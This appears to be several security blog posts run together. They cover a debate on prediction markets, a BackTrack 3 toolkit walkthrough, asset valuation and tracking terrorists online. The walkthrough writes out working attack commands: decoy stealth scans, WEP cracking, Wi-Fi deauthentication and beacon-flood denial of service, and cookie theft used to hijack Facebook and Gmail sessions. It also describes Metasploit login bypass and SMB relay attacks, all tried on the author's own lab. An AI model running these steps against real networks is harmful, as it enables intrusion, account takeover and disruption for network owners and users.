Quoted from Adam’s follow-up post:

Dan Guido said in a comment, “In security, SOMEONE knows the RIGHT answer. It is not indeterminate, the code is out there, your network is accessible to me and so on. There’s none of this wishy-washy risk stuff.”

I don’t think he’s actually right. Often times, no one knows the answer. Gathering it is expensive. Translating from “there’s a vuln” to “I can exploit it” isn’t always easy. For example, one of my co-workers tried exploit a (known, reported, not yet fixed) issue in an internal site via Sharepoint. Something in Sharepoint keeps munging his exploit code. I’ve even set my browser homepage to a page under his control. Who cares what I think, when we can experiment?

My followup comment, elaborating on my initial statements:

Thanks for noticing my comments

Let me first explain the statement of mine you quoted before explaining why I don’t think prediction markets are the right tool for security decisions. I’ll explain with your coworker and his SharePoint bug.

What if your coworker develops an exploit for that vuln and then goes on the prediction market and “predicts” that there will be a vuln in SharePoint? Or better, predicts that company X, which uses SharePoint, will suffer a breach? He waits until sufficient people have taken counter-views and then he discloses the vulnerability to iDefense anonymously or gives it to a blackhat to 0wn up company X with.

Another failure scenario:
Now someone on the security monitoring team at company X is discovers the blackhat 0wning up the internal network. SecMon guy goes on the market and also “predicts” a large breach (IMHO the market MUST be anonymous or it falls completely apart).

And another:
SecMon guy handles the breach with his auditors before disclosing the breach publicly. All the auditors jump on the market and “predict” more breaches.

And another:
Even better, what if someone from iDefense starts making bets?

The wrong type of questions:
Ok, enough of that. Now about prediction markets in general. Prediction markets make sense for certain problems. They probably make sense for BCP-type events, like when a major net outage is going to occur. They work well for flow data, things like how many transactions is this app going to process today. But all the security questions you want answered are the wrong type of question for prediction markets. There are things that make sense to be asked to groups of people and others that don’t. If your question can be answered on a scale of 1 to 100, prediction markets are a great tool. If the question is to pick a solution from an indefinite set of solutions (ie. the solution space is infinite), prediction markets aren’t the right tool.

Manipulate actions by controlling the market:
Here’s another scary thought. In The Alchemy of Finance, George Soros makes the point that people in a market aren’t really reacting to reality, they’re reacting to their perception of it. This should make sense to all you social engineers out there. If you set up this prediction market, I can make a giant panic at a large firm by creating a prediction that big bank X will have a huge break-in and betting heavily on it. I’ll be able to control the security policies of a big bank by selectively participating in the market, ie. I can manipulate actions just by controlling the market. This is never good.

Low numbers = easy to manipulate:
I’m going to guess that a security prediction market isn’t going to have that mass appeal needed to get a large number of participants. Few people are going to want to pretend they know something about security. To really explain why this is a bad thing you’re going to have to talk with someone with more of a math background, or wait a few days for me to figure out more about it, but… without a minimum number of people playing in the market, you make it extremely easy for people to game the whole system by playing both sides of each prediction. Once an actor in the market acquires a sufficient amount of capital, they’ll be able to overcome any drawdown and double down each prediction to just, well, make everyone lose money all the time.

And really, at the end of the day, if I’m an expert working for a big firm, am I really going to base any of my decisions on this prediction market or am I just going to do what I think is best?

With this large amount of utilities, it is sometimes hard to pick the correct one for the job. At Shmoocon 2008, a BackTrack representative gave a talk which was good, but focused on exploiting a Windows binary using Olly, not on showing off the features of the distribution. So I took it upon myself to click on every single link and find the awesome and the less awesome tools among the bunch. Note that the work that I did was for a presentation. There are videos which are self-explanatory but at times need commentary. I will provide some explanation in writing.

1. CREDITS

BackTrack3 – www.remote-exploit.org
Tactical Exploitation – H.D.Moore & Valsmith (Defcon 2007)‏
Metasploit Videos – learnsecurityonline.com

2. RECORDING

BackTrack comes with a video recording utility, recordmydesktop. You can either record the whole desktop or just one window using a window id. Some useful commands are:

recordmydesktop –no-sound -o out.ogg
xwininfo |grep “Window id:”|sed -e “s/xwininfo\:\ Window id:\ // ;s/\ .*//” #gives you a window id
recordmydesktop –nosound -windowid 0×0442 -o out2.ogg

3. INFORMATION GATHERING

In this category, the focus is on information aggregators, network discovery tools and OS and application vulnerability scanning tools.

3.1. Maltego – Personal Discovery

This is a tool from www.paterva.com that can be used for personal discovery. It has been in development for a while now and switched from a web version to a standalone binary version. It is a total information aggregator. It can search social networks such as LinkeIn, public PGP key servers. It can pull down various information from inside documents and other aggregators such as serversniff.de and robtex.com. It offers services such as geoip resolutions, email verification. The tool has a graphical interface and you can start your search by domain, IP address, website, email, person, phone number etc. The information is presented as a directional graph and any results can be further interrogated producing new results. You can use this to do various things such as profiling users of a certain server, searching for groups of people, determining relationships between websites, building PGP trees etc.

Maltego commonly finds phone numbers, addresses, names, personal sites, resumes, newsgroup postings, usernames, email addresses.

3.2. Nmap and Websites – Network Discovery

While doing network discovery, you are looking for variety of things such as MX records, internal networks, outsourced services, important server and open ports. The number one tool for this is still Nmap. A lot has been written about nmap, so I will just share my favorite usage and leave it at that:

nmap -sS -P0 -O -T Sneaky -p 445 -D 64.233.169.99 <ip_to_scan>

The above command initiates a stealth scan (-sS) which does not complete the TCP connection. This is fairly fast and unobtrusive. The -P0 flag tells nmap not to ping the IP which adds to stealth. The -T is a timing flag that can be set from Sneaky to Insane and determines the speed of packet generation. The -p flag specifies the port or a port range. You can use this flag either to add to stealth by specifying one or few ports, or add to thoroughness by providing a range of 1-65535. And last but not least, the -D flag allows you to specify a number of decoys. I usually put googlebot’s IP address. This makes nmap generate packets from your IP address and googlebots IP address (the response to which will go to google). This has an effect of confusing the target.

I would also like to share with you 2 less known network discovery tools. Two websites, www.domaintools.com and centralops.net provide nmap-like services. You can use these to create a domain dossier on any website that will include things like popular port scan, ping, traceroute, nslookup and whois. And best of all, the traffic is not going to come from you.

3.3. OS & Application Vulnerability Scanning

GFI LANguard is a tool I found as a useful replacement for Nessus (BackTrack does not include Nessus). It is only free with this BackTrack distribution. I found this tool to be a slightly slimmed down version of Nessus. On the other hand it was incredibly easy to use and it provides a wealth of information. It can scan a range of IPs to determine open ports, operating systems, common vulnerabilities, users, shares, running processes, security policies, missing patches, SNMP devices and functions they provide. This demo shows a limited use of its features and the results are more glorious on a larger network.

video

4. WIFI WEP Fun

BackTrack has an excellent collection of various wireless tools. I will present some of these here. I will use them to defeat WEP protection of my home router.

4.1 WEP Overview

WEP weakness stem from frequently repeating 24-bit IVs (initialization vectors) and the use of weak RC4 algorithm for keystream generation. This knowledge has been used to create a brute force attack. In this attack, you need to only capture a single encrypted packet and apply enormous amount of computing power to try all possible keys. This is possible due to the fact that the real key length is 40 for 64-bit keys and 104 for 128-bit keys. It has been shown that a weak key can be brute-forced in a manner of minutes. Another type of attack is FMS attack which is a statistical attack on known weak keys. You need to capture a lot of traffic to collect these keys, apply little CPU power and perform this attack. The tools that I describe below use the FMS attack.

4.2 Airo Tools

Below is a sequence of commands to use. I will not post the video due to its large size. You have to first bring up an interface in monitor mode. Then, you have to find a target with a command like “ wlanconfig ath0 list scan“. Then, use airodump-ng for collection of IVs, aireplay-ng for speedup of collection of IVs, and aircrack-ng for cracking of the key. In general, you need about 60KB of IVs before you should attempt to crack a 128-bit key. I waited until my filesize was a few megabytes. Depending on how fast the packets are flowing, the attack can take a few minutes or much more.

ifconfig wifi0 up
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up
wlanconfig ath0 list scan
airodump-ng –ivs -c 6 –write dump –bssid <AP’s_MAC> ath0
aireplay-ng -2 -b <AP’s_MAC> -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h <Innocent_computer’s_connected_to_AP_MAC> ath0
aircrack-ng -f 2 -a 1 -b <APs_MAC> -n 128 dump-01.ivs

4.3 Wesside-ng Demo

This is a tool that automates WEP cracking. It is still in early stage of development and I could only get it working with an atheros chipset. It is simple to use and does everything on its own. It finds a nearby vulnerable network, collects traffic and cracks the key.

wesside-ng -i ath0

video

5. Other WIFI tools

5.1 WifiZoo

This is the most useful tool that I found. I believe it comes from the CoreImpact toolkit. It is used primarily for cookie stealing on unencrypted and possibly encrypted (untested) networks. On my test network I managed to steal Facebook cookies. I had unlimited control of the Facebook account of the “victim” and could do anything up to changing the password. I also managed to steal Gmail cookies. Pretty much the only things I could do was read email and set a forwarding email. I could not change the password.

I am not posting a demo of this due to size limitations and privacy issues. I am posting a screenshot. As you can see the tool also automatically collects FTP data and SMTP data. What you have to do to get it working is:

1. nano /pentest/wireless/wifizoo/wifizoo.py and change conf.iface=’eth0′ to you monitor interface
2. ./wifizoo.py to start the tool
3. Start Firefox and change its HTTP proxy to 127.0.0.1:8080
4. Point the browser to 127.0.0.1:8000 which is WifiZoo’z webinterface

5. After that, it’s smooth sailing – click on the cookies link, click on a captured cookie, select “Set Cookie” and it will take you to the IP address of the website. You usually have to change the IP address to the name manually (e.g. change 69.63.176.140 to www.facebook.com in the browser location bar).

5.2 MDK3

I don’t know if this stands for “Murder Death Kill 3″ but it sure looks like it. I could not fully test this tool as I did not want to attack a large network and this is mainly where it would shine. This tools allows you to deploy a 3-part attack. First, you can deauthenticate clients from all nearby or a selected Access Point thus providing a denial of service. Second, you can flood the nearby APs with authentication requests. This can lead to a situation where some APs will need to be restarted or the become full and will not accept any new users. Third, you can create a beacon flood of fake APs specifying some ssid or generating random ssid names. After this step, the legitimate clients that were booted from their APs in step 1 will have a lot of problems reconnecting. This sounds like it could create some major havoc on unsuspecting networks. Most of this can probably be mitigated by a combination of MAC filtering and good firmware. The commands are:

mdk3 eth0 d # deauthentication attack
mdk3 eth0 a -a <AP_MAC> # authentication flood
mdk3 eth0 b -n MyEssid -w -c 11 # beacon flood mode

6. EXPLOITATION FRAMEWORKS

Backtrack comes with Metasploit, Inguma, W3AF and a few others. I have tested Metasploit and W3AF and will present my results here.

6.1 Metasploit 3 – unlocking a workstation

The problem is simple, I have a Windows 2000 VMware workstation that I don’t know the password to. Since it turns on, it probably goes online and gets an IP address. A nmap scan reveals that to be true. After that, I take a random exploit for windows 2000 and throw it at the box. This one happens to be a Net32Api CanonicalizePathName() stack overflow. The payload is set to vncinject. By default, it provides a “Courtesy Shell”. Typing “explorer.exe” in that shell bypasses the authentication window and allows the change or Administrator password. Note that I am using the Windows GUI Metasploit. I had to do this due to my need to start a VM.

video

6.2 Metasploit 3 – SMB Relay Attack

Multiple videos already exist for this attack elsewhere and while doing this I used a tutorial from learnsecurityonline.com. The attack mechanism is described nicely here and here. In a few words, whats going on here is – a man in the middle reflection attack based on the weakness of the Microsoft SMB file sharing authentication protocol. Note that I am using a web interface this time.

video

7. PENTESTING A WEBSERVER

The tools that you want to use for this are: webspiders, webserver vulnerability scanners, exploitation frameworks for web, credential brute-forcing utilities.

7.1 Nikto

This is web server scanner which performs tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers. It commonly finds outdated software versions (SSL, Apache, PHP), allowed HTTP methods, and various directories that are missing index files.

7.2 W3AF

This is a web application attack and audit framework. I have not experimented much with it. I used its webSpider to collect all the links of a webserver. Then I wrote a script to extract the users of the server by searching for “~”.

Summary: Using the information collected from just the above two tools, we can now go ahead and try to exploit the server by looking for existing vulnerabilities for the outdated software, examining the files in directories that are missing index files to try to find .htpasswd files or embedded passwords in PHP files. We can also try to bruteforce the accounts of the users we collected from the webspider. The tools to use for bruteforcing are Hydra, Medusa, and SSHater. They come with modules that allow you to attack most popular protocols (ssh, ftp, telnet, imap etc).

8. TOOLS I DIDN’T LIKE

There were a few that I didn’t like but others I just didn’t find useful. The list would be too long if I had to list it here. I will mention the fact that THC-Hydra and Medusa, both online password brute forcers, core dumped when I tried to use them.

Unfortunately, there does not seem to be any foolproof methods for calculating asset values.

My presentation provides a possible guideline to measure relative asset values. This will aid in prioritizing remediation.

Prioritizing Vulnerabilities for Remediation

“Alright dude, so like, if all these terrorists go around posting stuff on the Internet, why can’t we just use their Internet posts to track them down?”

What annoys me is that I can think of several answers to this question but I do not know which one is in actuality most of the times true.

The several answers I can think of are:

1. These are public forums that have no direct ties with Terrorists organizations, and terrorists post stuff from either compromised boxes or from Internet cafes.
2. These are sites whose content is directly controlled by terrorists groups, but they are hosted on a Web Hosting company’s server. All registration info is falsified and updates to the site are done anonymously so that the individuals controlling the content cannot be tracked.
3. The terrorist group compromises a box, registers a domain for it, and posts all their stuff there.
4. The problem is logistics. Most of these hosts are outside of the U.S. and there are legislative issues that hinder investigative authorities from gathering evidence before it disappears.

What are your thoughts on this? Does anyone know which, if any, is most often the case? Does anyone know of another scenario that is often the case? How would you answer this question to a layman?

I guess what I am trying to say is people sometimes lose track of the larger picture while working on specific problems. While specifics are arguably most important in correcting problems, people should not loose track of the larger picture.

Comments?